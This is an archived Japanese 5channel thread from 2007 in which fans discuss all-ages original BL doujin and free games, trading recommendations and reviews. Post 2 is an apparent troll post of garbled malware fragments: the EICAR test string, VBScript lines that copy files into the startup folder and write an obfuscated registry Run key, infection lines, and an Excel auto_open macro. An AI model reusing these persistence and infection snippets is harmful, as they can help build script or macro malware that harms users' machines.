5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

BL@オリジナル同人ゲーム総合(一般) 2

1 :名無しって呼んでいいか?:2007/08/13(月) 13:55:25 ID:???
全年齢対象オリジナルの、同人ゲーム/フリーゲームを語るスレッドです。
(男性が主人公で同性と恋愛もしくは友情以上の要素があるゲーム)

■前スレ
BL@オリジナル同人ゲーム総合(一般)
http://game12.2ch.net/test/read.cgi/ggirl/1117417719/

2 :名無しって呼んでいいか?:2007/08/13(月) 15:13:07 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


3 :名無しって呼んでいいか?:2007/08/14(火) 21:29:01 ID:???
保守?

4 :名無しって呼んでいいか?:2007/08/14(火) 22:06:05 ID:???
BLって表記されてないけど
女性向けって書いてあるものもここでOKなのかな?

5 :名無しって呼んでいいか?:2007/08/14(火) 22:32:29 ID:???
>4
OKかと

6 :名無しって呼んでいいか?:2007/08/15(水) 01:39:41 ID:???
>4
明らかに乙女ゲーな「女性向け」じゃなけりゃ良いと思う
個人的にそういうニアBL的な作風好きなので色々知りたい

7 :名無しって呼んでいいか?:2007/08/18(土) 10:07:43 ID:???
昨日の収穫はどうだった?

8 :名無しって呼んでいいか?:2007/08/19(日) 18:14:03 ID:???
新作は気になるのが無かったので買わなかった
かわりに無料配布とか一杯貰ってきた感じだな。

しかし熱かったな・・・

9 :名無しって呼んでいいか?:2007/08/30(木) 12:56:16 ID:???
保守

派図留新作やってみた。
個人的に前のクイズ系より面白い問題が多かったような気がするけど
あれって正答は表示されないのかな?勘でやったからどういう理屈なのか気になる

10 :名無しって呼んでいいか?:2007/08/31(金) 01:16:24 ID:???
派図留ってサザエさん時空?

11 :名無しって呼んでいいか?:2007/09/03(月) 10:47:06 ID:???
>10
違うんじゃない?
新作まだやってないんでゲーム内でそれっぽい事言ってたんならスマンのだけど
前に言ってた分じゃ卒業させないために過去話に戻ってるんじゃなかったっけ?

12 :名無しって呼んでいいか?:2007/09/04(火) 03:19:23 ID:???
推眠某害で新聞掲載されてたから読んだ
面白かったけど一号の相談コーナーのAさんて誰なんだろう?

13 :名無しって呼んでいいか?:2007/09/04(火) 09:52:15 ID:???
あんなふうに惚気そうなキャラなんて一人しかいないような……
Aは別にイニシャルじゃないだろうし

14 :名無しって呼んでいいか?:2007/09/04(火) 16:36:47 ID:???
>>11
あーなるほど、d
干支の方の子達はもう中学生になってたから混乱した

15 :名無しって呼んでいいか?:2007/09/04(火) 19:34:26 ID:???
>13
まあ待て、人物紹介にAのやついたぞ

16 :名無しって呼んでいいか?:2007/09/04(火) 22:46:31 ID:???
>>15
ああ、出番少ししかないから忘れてた
じゃああの人なのかな?

17 :名無しって呼んでいいか?:2007/09/05(水) 06:36:44 ID:???
>>15
そういえばいたね
体験版じゃ立ち絵すら無かったからすっかり忘れてた

それにしても、眼鏡様酷いな。本編ではどんな活躍してくれるのやら 

18 :名無しって呼んでいいか?:2007/09/07(金) 23:46:29 ID:???
なんか通販予約のお知らせ出てたね。
特典冊子の為に予約するか様子見てからにするか迷ってる。
イベントで貰った姐さんいませんか?内容どうだった?

19 :名無しって呼んでいいか?:2007/09/08(土) 01:03:51 ID:???
本当だ、通販予約の知らせ出てた
自分は特典冊子の為に予約かな
買うの決めてるから、どうせなら特典付きが良い
値段変わらないだろうし

20 :名無しって呼んでいいか?:2007/09/08(土) 01:13:19 ID:???
>>19
メ欄わざと?

21 :名無しって呼んでいいか?:2007/09/08(土) 01:16:02 ID:???
すぐ毒のあるケンカ腰ワロタ

22 :名無しって呼んでいいか?:2007/09/08(土) 01:18:52 ID:???
え?
ただ理由なく上げなくても&同一人物なら軽くコテハン状態だな、
と思っただけだったんだけど

…まあ、いいや

23 :名無しって呼んでいいか?:2007/09/08(土) 01:27:14 ID:???
まあ喧嘩は止せよ、発売間近なんだし楽しみに待とうぜ

24 :名無しって呼んでいいか?:2007/09/09(日) 14:39:18 ID:???
最近久々にフリゲ熱が戻ってきて悪夢症候群のp&Eをやってる
今pの数話終わらせたところなんだけど
キャラ紹介で○○に登場、というのが結構あるのに
すでに公開終わってるらしく見当たらないゲームが多くて残念だな

25 :名無しって呼んでいいか?:2007/09/13(木) 05:12:30 ID:???
延びたね・・・

26 :名無しって呼んでいいか?:2007/09/15(土) 16:18:06 ID:???
超層(当て字)・・・
見た目は渋くていい感じなのに、中身が小学生女子・・・萌えん
いい年した男が集まって、つまんねー事でいちいちキャンキャンいがみあうな鬱陶しい

27 :名無しって呼んでいいか?:2007/09/18(火) 18:30:44 ID:???
>>26
まだやってないからわからんが、それはギャップ萌えを狙ったのではなかろうか?

28 :名無しって呼んでいいか?:2007/09/21(金) 04:30:37 ID:???
派図留の子はザ・ワールドでも使えるのか

29 :名無しって呼んでいいか?:2007/09/21(金) 13:45:53 ID:???
おまけ小説か
あれはどこを目指して進んでるんだろうな

30 :名無しって呼んでいいか?:2007/09/21(金) 19:38:24 ID:???
またループオチだったら泣く

31 :名無しって呼んでいいか?:2007/09/24(月) 23:04:07 ID:???
>>27
やってみたけどギャップ萌えではなかったよ
26は初期の印象じゃないかな。途中からはさほどキャンキャンでもなかった

テキスト達者だし、絵も綺麗。雰囲気渋くてよく出来てるなあって感じ。

ただ、BLというより、キャラの関係性をそれっぽく掘り下げて見ましたってだけで
骨格は一般ゲーだと思った。BLをしない層のほうが評価高そう。

32 :名無しって呼んでいいか?:2007/09/25(火) 02:01:55 ID:???
やってみたけど、一般のほうが評価高いってのはどうかなあ
雰囲気だけのやおい二次SS読んでるような感じだった
テキストは回りくどい&重複多くて
硬派でしっとりというよりは単にテンポがよくないのではないかと
絵はすっごい良かった

33 :名無しって呼んでいいか?:2007/09/25(火) 02:51:12 ID:???
二次創作SSは言い得て妙かも知れんね。
確かにあのノリは二次ジャンルで割と見たことある感じだ。
絵はほんと綺麗だったね

34 :名無しって呼んでいいか?:2007/09/25(火) 03:44:10 ID:???
>雰囲気だけのやおい二次SS読んでるような感じだった

だから、この部分が普段BLしない層には新鮮に映るんじゃないかな、と

終わった後で、一般系レビューを思い返してみると、
腐ィルターを持たない人ほど、その二次SSぽい絡みを、
変わった方向からのキャラの掘り下げとして肯定的に捉えてるように感じたんで

35 :名無しって呼んでいいか?:2007/09/25(火) 13:19:53 ID:???
掘り下げられてなかったから二次SSっていわれてるんじゃ?

36 :名無しって呼んでいいか?:2007/09/29(土) 23:40:23 ID:???
全年齢好きで、色々やってみてるんだがどれもイマイチ。
雰囲気モノじゃなくてストーリーがしっかりした全年齢BLはないもんかね

37 :名無しって呼んでいいか?:2007/09/30(日) 02:38:46 ID:???
>>36
魔奈津の扉なんていかがかな?サウンドベル形式でED数も多め
・・・攻略無しじゃキッツイけど
あと、一部ルートにホラー要素有り
知ってたらごめん


38 :名無しって呼んでいいか?:2007/09/30(日) 19:45:18 ID:???
>>36
12推ならある

39 :名無しって呼んでいいか?:2007/10/01(月) 19:03:00 ID:???
>36
既出だけど悪夢症候群の遊戯。
女の子役を女の子としてみれるならという条件つきだけど
一般、男性にも評価は高い。

40 :名無しって呼んでいいか?:2007/10/01(月) 22:37:24 ID:???
>39
36は全年齢「BL」つってないか?

41 :名無しって呼んでいいか?:2007/10/01(月) 22:38:57 ID:???
悪夢症候群はどちらかといえば雰囲気ゲーじゃないか?

42 :36:2007/10/01(月) 23:57:16 ID:???
おお、気付いたら沢山お勧めして貰っててありがとう
とりあえず37お奨めの魔奈津の扉でもやってみるよ!
悪夢症候群もやってみたんだがどうにも肌に合わず……
面白いとは思うんだけどなあ。好みでないんだよなあ。

43 :名無しって呼んでいいか?:2007/10/03(水) 14:38:28 ID:???
>40
普段BLなんてやらない男性や女性もプレイしておもしろい、という意味で書いたんだが
紛らわしくてスマソ。

44 :名無しって呼んでいいか?:2007/10/09(火) 23:36:34 ID:???
過疎ってるなー……なんか話題ないかね

45 :名無しって呼んでいいか?:2007/10/10(水) 00:29:06 ID:???
キシュツな話題だったらスマソ

いつの間にか、邪夢の僕彼が出てたんで買ったんだが、自分的に当たりだった
主人公がまったく好みじゃなくて購入迷ったんだけど、攻略キャラはみんな良かったし、特に演出が好きだ

46 :名無しって呼んでいいか?:2007/10/10(水) 01:10:40 ID:???
数日前だけど優雅等コンプしたよ、と
ネタバレたらごめんなのでちょっと改行



EDはノーマル3、トゥルーED3、バッド2、デッド5、大団円で計14
CGはギャラリーのコマ数43枚+コンプ絵
個人的にはなかなか萌えた
甜茶氏は主人公好きすぎ
でも主人公との仲ははっきり恋愛、まではいかない感じだった
つか全ED中一番BL的に進んだ仲になったと思われるのが主人公とメル欄だった件

別ルート開けるようになるとシーンの合間に追加の文章入ったりするから
一区切りついたと思ったら最初からやり直してみると吉
ルートを終えるごとに事件や周辺の全体像が見えてくる作り
ただA氏については出自は想像つくけど細かいフォローがなかったかも
見落としただけかも知れん、他の人の見解を聞きたいところ
大団円ルートはちょっと賛否両論あるかも知れない
個人的にはまあありか?という感じだった

特典冊子は一番最初のノーマルED後かな?敏腕記者と主人公の話

47 :名無しって呼んでいいか?:2007/10/10(水) 01:59:43 ID:???
自分も優雅等コンプしたよー。
ミステリー仕立てのBLと云うかBL仕立てのミステリーって感じだったなあ。
結構描写が細やかだから二次創作し甲斐があるけど、逆に妄想しない人だと物足りないやも。
個人的に警官と新聞記者が物凄い萌えた。
良い意味でどんでん返しの多いシナリオで結構楽しませて貰ったな。ご馳走様。
幼馴染のバッドEDがトゥルーEDと対比させて見ると鳥肌モノだった。
こう言う対比モノ好きだから良かったわー。
とにかく値段以上に楽しませてもらったよー。

48 :名無しって呼んでいいか?:2007/10/10(水) 02:07:53 ID:???
お、お仲間。
個人的には大団円ルートのアレは無しだったなあ。
それまでの雰囲気が好きだったもんで。
無理に毛色の違う要素を盛り込まなくても
例の殺人事件の真相だけで十分良かったのに、と。
A氏については、たしかに大団円でも結局書かれてなかったような気がする。
日記?のほうに出てきた世代が3つくらいあるから混乱してそっち見落としたかも。
今度読み直してみる。
しかし本当にまともなのが一人しかいなかったなw
是非キバと主人公の恋愛エンドも見てみたかった…

まあしかし、なんだかんだで買ってよかった。
全体的な雰囲気づくりがすごく上手かったね。
体験版の時と比べてシステムがちょっと進化してて
デザインワークがツボだったし
あのゲームではあんまり見ない水彩塗りも合ってた。

49 :名無しって呼んでいいか?:2007/10/10(水) 12:07:58 ID:???
>>45
僕彼、公式のアンケ見て確信もてた。
主人公より八巻総受けうわ何をす(ry

50 :名無しって呼んでいいか?:2007/10/11(木) 04:41:34 ID:???
優雅等早く来ないかな
サイトのブログ見て噴いた
フリーハンドであれだけ出来る人っているんだね


13 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)